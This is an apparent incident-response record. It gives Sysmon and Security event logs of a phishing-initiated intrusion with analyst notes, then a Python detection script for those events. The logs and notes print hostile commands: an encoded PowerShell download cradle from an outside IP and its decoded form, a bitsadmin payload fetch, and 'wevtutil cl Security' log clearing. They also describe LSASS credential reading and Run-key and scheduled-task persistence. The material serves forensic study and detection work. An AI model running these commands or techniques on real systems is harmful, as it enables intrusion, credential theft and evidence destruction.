{"EventID":1,"TimeCreated":"2024-11-15T16:42:33Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1059.001","UtcTime":"2024-11-15 16:42:33.441","ProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ProcessId":3784,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.19041.1","Description":"Windows PowerShell","Product":"Microsoft Windows Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"powershell.exe -NonI -W Hidden -Enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABkAD0AJABjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMgAwADMALgAwAC4AMQAxADMALgA4ADcALwB1AHAAZABhAHQAZQAnACkA","CurrentDirectory":"C:\\Users\\m.cohen\\","User":"LIFETECHPHARMA\\m.cohen","LogonGuid":"{8f2a4b91-2a14-6541-0000-002088f43a00}","LogonId":"0x3af488","TerminalSessionId":1,"IntegrityLevel":"High","Hashes":"MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1848474F57","ParentProcessGuid":"{8f2a4b91-1b88-6541-0000-00101c2a0900}","ParentProcessId":2240,"ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","ParentCommandLine":"\"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\"","ParentUser":"LIFETECHPHARMA\\m.cohen","analyst_note":"🔴 TRIGGERING EVENT: Outlook → PowerShell -NonI -W Hidden -Enc | Encoded payload (base64 of UTF-16LE) decodes to: $c=New-Object System.Net.WebClient;$c.Headers.Add('User-Agent','Mozilla/5.0');$d=$c.DownloadString('https://203.0.113.87/update') | Downloads second stage into $d. Note IntegrityLevel High inherited from the Outlook session: every process spawned from here runs elevated"}
{"EventID":3,"TimeCreated":"2024-11-15T16:42:41Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1071.001","UtcTime":"2024-11-15 16:42:41.882","ProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ProcessId":3784,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"LIFETECHPHARMA\\m.cohen","Protocol":"tcp","Initiated":true,"SourceIsIpv6":false,"SourceIp":"10.10.1.45","SourceHostname":"WS-CFO-01.lifetechpharma.local","SourcePort":51204,"DestinationIsIpv6":false,"DestinationIp":"203.0.113.87","DestinationHostname":"-","DestinationPort":443,"DestinationPortName":"https","analyst_note":"C2 connection #1 from powershell.exe to 203.0.113.87:443 (downloads svchost32.exe). Sysmon EID 3 records only the connect, not the TLS content; the file write 27 seconds later is the evidence the download succeeded"}
{"EventID":11,"TimeCreated":"2024-11-15T16:43:08Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1547.001","UtcTime":"2024-11-15 16:43:08.114","ProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ProcessId":3784,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","CreationUtcTime":"2024-11-15 16:43:08.114","analyst_note":"⚠ svchost32.exe dropped to AppData\\Roaming, masquerading as the legitimate svchost. PE header compile timestamp 2018-04-09T08:00:00Z is forged (the file was written at 16:43:08, which is what CreationUtcTime records). CreationUtcTime here is the genuine NTFS creation time; a later change to it would surface as Sysmon EID 2 (FileCreateTime)"}
{"EventID":1,"TimeCreated":"2024-11-15T16:43:12Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1547.001","UtcTime":"2024-11-15 16:43:12.771","ProcessGuid":"{8f2a4b91-3c44-6541-0000-0010e8b12c01}","ProcessId":4128,"Image":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","FileVersion":"1.0.0.0","Description":"Windows Host Service","Product":"Windows Operating System","Company":"Microsoft Corporation","OriginalFileName":"svchost32.exe","CommandLine":"\"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe\" -k netsvcs","CurrentDirectory":"C:\\Windows\\system32\\","User":"LIFETECHPHARMA\\m.cohen","LogonGuid":"{8f2a4b91-2a14-6541-0000-002088f43a00}","LogonId":"0x3af488","TerminalSessionId":1,"IntegrityLevel":"High","Hashes":"MD5=A8F5F167F44F4964E6C998DEF96B5E7D,SHA256=3B4C14A87E5F9D8C2A1F4E6B9C0D2E7A1B3C5D8F2A4E6C8B0D3E5A7C1F4B8D2E","ParentProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ParentProcessId":3784,"ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentUser":"LIFETECHPHARMA\\m.cohen","analyst_note":"svchost32.exe launched by PowerShell: implant first execution. Description/Company strings come from the file's version resource and prove nothing; EID 1 carries no signature fields, so verify Authenticode separately. The real svchost.exe lives in System32 and receives -k from services.exe, never from powershell.exe"}
{"EventID":13,"TimeCreated":"2024-11-15T16:43:15Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1547.001","UtcTime":"2024-11-15 16:43:15.009","ProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ProcessId":3784,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventType":"SetValue","TargetObject":"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsHostSvc","Details":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe -k netsvcs","analyst_note":"⚠ Registry Run key persistence: HKCU Run value WindowsHostSvc set to launch svchost32.exe from AppData at every logon of m.cohen"}
{"EventID":10,"TimeCreated":"2024-11-15T16:46:22Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1003.001","UtcTime":"2024-11-15 16:46:22.338","SourceProcessGuid":"{8f2a4b91-3c44-6541-0000-0010e8b12c01}","SourceProcessId":4128,"SourceImage":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","SourceUser":"LIFETECHPHARMA\\m.cohen","TargetProcessGuid":"{8f2a4b91-0b11-6541-0000-001088742200}","TargetProcessId":728,"TargetImage":"C:\\Windows\\System32\\lsass.exe","TargetUser":"NT AUTHORITY\\SYSTEM","GrantedAccess":"0x1010","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+9d314|C:\\Windows\\System32\\KERNELBASE.dll+13d0a|UNKNOWN(00007FF8B4822F4A)","analyst_note":"🔴 LSASS memory access from svchost32.exe. GrantedAccess 0x1010 = PROCESS_QUERY_LIMITED_INFORMATION (0x1000) | PROCESS_VM_READ (0x0010), the minimal mask for reading LSASS memory and a well-known credential-dumping access pattern (not PROCESS_QUERY_INFORMATION, which is 0x0400). CallTrace ends in UNKNOWN: the call originates from memory not backed by any loaded module. The High integrity level inherited from the Outlook session is what lets this handle open succeed"}
{"EventID":1,"TimeCreated":"2024-11-15T16:51:04Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1197","UtcTime":"2024-11-15 16:51:04.882","ProcessGuid":"{8f2a4b91-3d88-6541-0000-0010f4c23101}","ProcessId":5012,"Image":"C:\\Windows\\System32\\bitsadmin.exe","FileVersion":"7.8.19041.1","CommandLine":"bitsadmin.exe /transfer svcupdate /download /priority FOREGROUND https://203.0.113.87/update2 C:\\Users\\m.cohen\\AppData\\Local\\Temp\\UpdateHelper.tmp","CurrentDirectory":"C:\\Windows\\system32\\","User":"LIFETECHPHARMA\\m.cohen","LogonGuid":"{8f2a4b91-2a14-6541-0000-002088f43a00}","ParentProcessId":4128,"ParentImage":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","analyst_note":"⚠ BITS transfer used to pull a further payload (UpdateHelper.tmp → UpdateHelper.dll) from 203.0.113.87, with bitsadmin spawned by svchost32.exe. The job name svcupdate and URL are also recorded in Microsoft-Windows-Bits-Client/Operational (event 59), a second source if Sysmon is ever cleared"}
{"EventID":4698,"TimeCreated":"2024-11-15T16:52:17Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Security","SubjectUserSid":"S-1-5-21-3847948241-1882284908-4023491847-1844","SubjectUserName":"m.cohen","SubjectDomainName":"LIFETECHPHARMA","SubjectLogonId":"0x3af488","TaskName":"\\Microsoft\\Windows\\WindowsUpdate\\ScheduledUpdateCheck","TaskContent":"2024-11-15T18:00:001C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe-k netsvcs","analyst_note":"⚠ Scheduled task created for persistence, placed under \\Microsoft\\Windows\\WindowsUpdate to blend in with built-in tasks; runs svchost32.exe -k netsvcs daily from 18:00 (TaskContent shown with its XML tags stripped). Same LogonId 0x3af488 as the PowerShell parent, tying it to the Outlook session"}
{"EventID":3,"TimeCreated":"2024-11-15T18:52:04Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1021.003","UtcTime":"2024-11-15 18:52:04.221","ProcessGuid":"{8f2a4b91-3c44-6541-0000-0010e8b12c01}","ProcessId":4128,"Image":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","User":"LIFETECHPHARMA\\m.cohen","Protocol":"tcp","Initiated":true,"SourceIsIpv6":false,"SourceIp":"10.10.1.45","SourceHostname":"WS-CFO-01.lifetechpharma.local","SourcePort":51401,"DestinationIsIpv6":false,"DestinationIp":"10.10.2.20","DestinationHostname":"SERVER-FIN-01.lifetechpharma.local","DestinationPort":135,"DestinationPortName":"epmap","analyst_note":"⚠ Lateral movement initiation: RPC endpoint mapper (135) on SERVER-FIN-01 from svchost32.exe, the first leg of WMI/DCOM remote execution (RuleName T1021.003). Port 135 alone is ambiguous; confirm with the follow-on connection to the dynamic RPC port, a logon type 3 (4624) for m.cohen on SERVER-FIN-01, or a WmiPrvSE.exe child process on the server"}
{"EventID":1,"TimeCreated":"2024-11-15T19:14:22Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1070.001","UtcTime":"2024-11-15 19:14:22.004","ProcessGuid":"{8f2a4b91-4a11-6541-0000-001022c44201}","ProcessId":6204,"Image":"C:\\Windows\\System32\\wevtutil.exe","FileVersion":"10.0.19041.1","CommandLine":"wevtutil.exe cl Security","CurrentDirectory":"C:\\Windows\\system32\\","User":"LIFETECHPHARMA\\m.cohen","LogonGuid":"{8f2a4b91-2a14-6541-0000-002088f43a00}","ParentProcessId":4128,"ParentImage":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","analyst_note":"⚠ Event log cleared: wevtutil cl Security run by svchost32.exe. This clears the entire Security log on WS-CFO-01 (wevtutil cl is never partial); the first event written afterwards is 1102 (audit log cleared) with m.cohen as the subject, itself a high-fidelity alert. The Sysmon channel was not cleared, which is why this chain survived; it is not tamper-proof (the same command with the Microsoft-Windows-Sysmon/Operational channel name would clear it), so forward it off-host in near real time"}
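A detection pass over events of this shape, added here as an example and not part of the incident record. It decodes the -Enc payload exactly as the first analyst note does, expands the LSASS GrantedAccess mask into named rights, and flags the Office-to-PowerShell spawn, the svchost masquerade outside System32, the user-writable Run key, the LSASS read from unbacked memory and the log clear. The sample events are constructed, trimmed copies of five events above; the rule names, the user-writable path list and the System32 allowlist are this example's own choices, not a product's.

```python
"""Sysmon/Security detection pass (added example; sample events constructed from the chain above)."""
import base64
import json
import ntpath
import re

# The -Enc blob from the first event above (base64 of UTF-16LE PowerShell).
ENC = ("JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAu"
       "AEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAA"
       "JwApADsAJABkAD0AJABjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMgAwADMALgAw"
       "AC4AMQAxADMALgA4ADcALwB1AHAAZABhAHQAZQAnACkA")

# Constructed sample: trimmed copies of five events from the chain above, metadata dropped.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": "powershell.exe -NonI -W Hidden -Enc " + ENC},
    {"EventID": 1, "Image": r"C:\Users\m.cohen\AppData\Roaming\Microsoft\Windows\svchost32.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Users\m.cohen\AppData\Roaming\Microsoft\Windows\svchost32.exe" -k netsvcs'},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostSvc",
     "Details": r"C:\Users\m.cohen\AppData\Roaming\Microsoft\Windows\svchost32.exe -k netsvcs"},
    {"EventID": 10, "SourceImage": r"C:\Users\m.cohen\AppData\Roaming\Microsoft\Windows\svchost32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d314|C:\Windows\System32\KERNELBASE.dll+13d0a|UNKNOWN(00007FF8B4822F4A)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wevtutil.exe",
     "ParentImage": r"C:\Users\m.cohen\AppData\Roaming\Microsoft\Windows\svchost32.exe",
     "CommandLine": "wevtutil.exe cl Security"},
]

OFFICE = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")   # crude path allowlist; real rules key on signature/hash
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")
PROCESS_RIGHTS = {  # process access rights from winnt.h
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}


def parse_events(text):
    """Parse newline-delimited JSON, one event per line, as exported above."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    return ntpath.basename(path).lower()


def decode_encoded_command(cmdline):
    """Decode the first -e/-enc/-EncodedCommand argument that is valid base64 UTF-16LE, else None.
    PowerShell accepts any unambiguous prefix of -EncodedCommand, hence the loose '-e[a-z]*'."""
    for m in re.finditer(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]+)", cmdline):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):   # e.g. '-ExecutionPolicy Bypass' is not base64
            continue
    return None


def lsass_access_flags(mask):
    """Expand a Sysmon GrantedAccess mask (hex string or int) into named rights, lowest bit first."""
    value = int(mask, 16) if isinstance(mask, str) else mask
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if value & bit]


def detect(ev):
    """Return (rule, detail) hits for one event."""
    hits, eid, cmd = [], ev.get("EventID"), ev.get("CommandLine", "")
    image, parent = ev.get("Image", ""), ev.get("ParentImage", "")
    if eid == 1:
        if basename(parent) in OFFICE and basename(image) in SHELLS:
            hits.append(("office_spawns_powershell", decode_encoded_command(cmd) or cmd))
        if basename(image).startswith("svchost") and not image.lower().startswith(SYSTEM_DIRS):
            hits.append(("svchost_outside_system32", image))
        if basename(image) == "wevtutil.exe" and re.search(r"(?i)\b(cl|clear-log)\b", cmd):
            hits.append(("event_log_cleared", cmd))
    elif eid == 10 and basename(ev.get("TargetImage", "")) == "lsass.exe":
        flags = lsass_access_flags(ev.get("GrantedAccess", "0x0"))
        src = ev.get("SourceImage", "")
        if "PROCESS_VM_READ" in flags and not src.lower().startswith(SYSTEM_DIRS):
            detail = f"{src} {ev['GrantedAccess']} ({'|'.join(flags)})"
            if "UNKNOWN" in ev.get("CallTrace", ""):   # frame with no backing module
                detail += " call from unbacked memory"
            hits.append(("lsass_memory_read", detail))
    elif eid == 13 and "\\currentversion\\run\\" in ev.get("TargetObject", "").lower():
        if any(p in ev.get("Details", "").lower() for p in USER_WRITABLE):
            hits.append(("run_key_user_writable_path", ev["Details"]))
    return hits


def run(events):
    return [{"rule": r, "EventID": ev["EventID"], "detail": d} for ev in events for r, d in detect(ev)]


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Each rule keys on the same field the corresponding analyst note relies on, so a miss in this script is a miss in the note's reasoning too; the System32 path allowlist on the LSASS and svchost rules is only there to keep the sample readable and should be a signature or hash allowlist of known EDR/AV binaries in production.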